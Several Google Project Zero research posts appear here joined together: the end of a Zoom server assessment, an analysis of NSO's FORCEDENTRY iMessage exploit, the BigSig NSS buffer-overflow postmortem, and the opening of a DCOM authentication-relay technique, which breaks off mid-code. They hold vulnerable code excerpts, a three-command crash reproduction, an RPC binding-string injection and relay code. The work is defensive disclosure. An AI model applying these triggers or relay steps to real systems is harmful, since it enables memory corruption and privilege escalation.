The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

      } else if (seg->getType() == jbig2SegCodeTable) {

        codeTables->append(seg);

      }

    } else {

      error(errSyntaxError, getPos(),

            "Invalid segment reference in JBIG2 text region");

      delete codeTables;

      return;

    }

  }

...

  // get the symbol bitmaps

  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        symbolDict = (JBIG2SymbolDict *)seg;

        for (k = 0; k < symbolDict->getSize(); ++k) {

          syms[kk++] = symbolDict->getBitmap(k); // (4)

        }

      }

    }

  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

This shouldn't have happened: A vulnerability postmortem

Posted by Tavis Ormandy, Project Zero

Introduction

This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.

In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.

First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.

Analysis

Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.

struct VFYContextStr {

   SECOidTag hashAlg; /* the hash algorithm */

   SECKEYPublicKey *key;

   union {

       unsigned char buffer[1];

       unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];

       unsigned char ecdsasig[2 * MAX_ECKEY_LEN];

       unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];

   } u;

   unsigned int pkcs1RSADigestInfoLen;

   unsigned char *pkcs1RSADigestInfo;

   void *wincx;

   void *hashcx;

   const SECHashObject *hashobj;

   SECOidTag encAlg;    /* enc alg */

   PRBool hasSignature;

   SECItem *params;

};

Fig 1. The VFYContext structure from NSS.


The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at
2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.

Okay, but what happens if you just....make a signature that’s bigger than that?

Well, it turns out the answer is memory corruption. Yes, really.


The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.

The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:

# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,

# which contains function pointers (bigger would work too, but takes longer to generate).

$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key

$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...

$ vfychain -a bigsig.cer

Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.

The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are  arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.

           case rsaPssKey:

               sigLen = SECKEY_SignatureLen(key);

               if (sigLen == 0) {

                   /* error set by SECKEY_SignatureLen */

                   rv = SECFailure;

                   break;

               }

               if (sig->len != sigLen) {

                   PORT_SetError(SEC_ERROR_BAD_SIGNATURE);

                   rv = SECFailure;

                   break;

               }

               PORT_Memcpy(cx->u.buffer, sig->data, sigLen);

               break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.

I think this vulnerability raises a few immediate questions:

  • Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.

  • Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.

  • Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.

  • Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.

  • Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.

  • Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.

This wasn’t a process failure, the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, invest in memory safety, fuzzing and test coverage.

NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.

I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.

Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.

  • Did Mozilla have good test coverage for the vulnerable areas? YES.
  • Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
  • Is there a mutator capable of extending ASN1_ITEMs? YES.
  • Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.

How did I find the bug?

I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.

Stack Coverage

The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.

#include <stdio.h>

#include <string.h>

#include <limits.h>

 

static char buf[128];

 

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }

void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }

void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

 

typedef void (* dispatch_t)(int, size_t);

 

dispatch_t handlers[UCHAR_MAX] = {

    cmd_handler_foo,

    cmd_handler_bar,

    cmd_handler_baz,

};

 

int main(int argc, char **argv)

{

    int cmd;

 

    while ((cmd = getchar()) != EOF) {

        if (handlers[cmd]) {

            handlers[cmd](getchar(), getchar());

        }

    }

}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]

To solve this problem, I’ve been experimenting with monitoring the call stack during execution.

The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.

Object Isolation

Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.

The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.

Do these approaches work?

I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.

Lessons Learned

How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?

What went wrong

Issue #1 Missing end-to-end testing.

NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

 char *dest[2048];

 for (auto tpl : templates) {

   PORTCheapArenaPool pool;

   SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),

                  static_cast<unsigned int>(Size)};

   PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);

   (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);

   PORT_DestroyCheapArena(&pool);

 }

Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.

This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.

Issue #2 Arbitrary size limits.

There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.

A reasonable choice might be 224-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.

While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.

Issue #3 Misleading metrics.

All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.

This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.

What Worked

  • The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.

It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.

Recommendations

This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.

Short Term

  • Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 224-1 = 16,777,215  bytes.
  • The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
  • The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.

Solution

This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.

Credits

I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.

Thanks to the NSS team, who helped triage and analyze the vulnerability.


[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.

Windows Exploitation Tricks: Relaying DCOM Authentication

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of an DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding then the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of an DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());

var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);

Console.WriteLine("OXID: {0:X08}", std.Oxid);

Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();

std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine($"objref:{0}:", Convert.ToBase64String(std.ToArray());

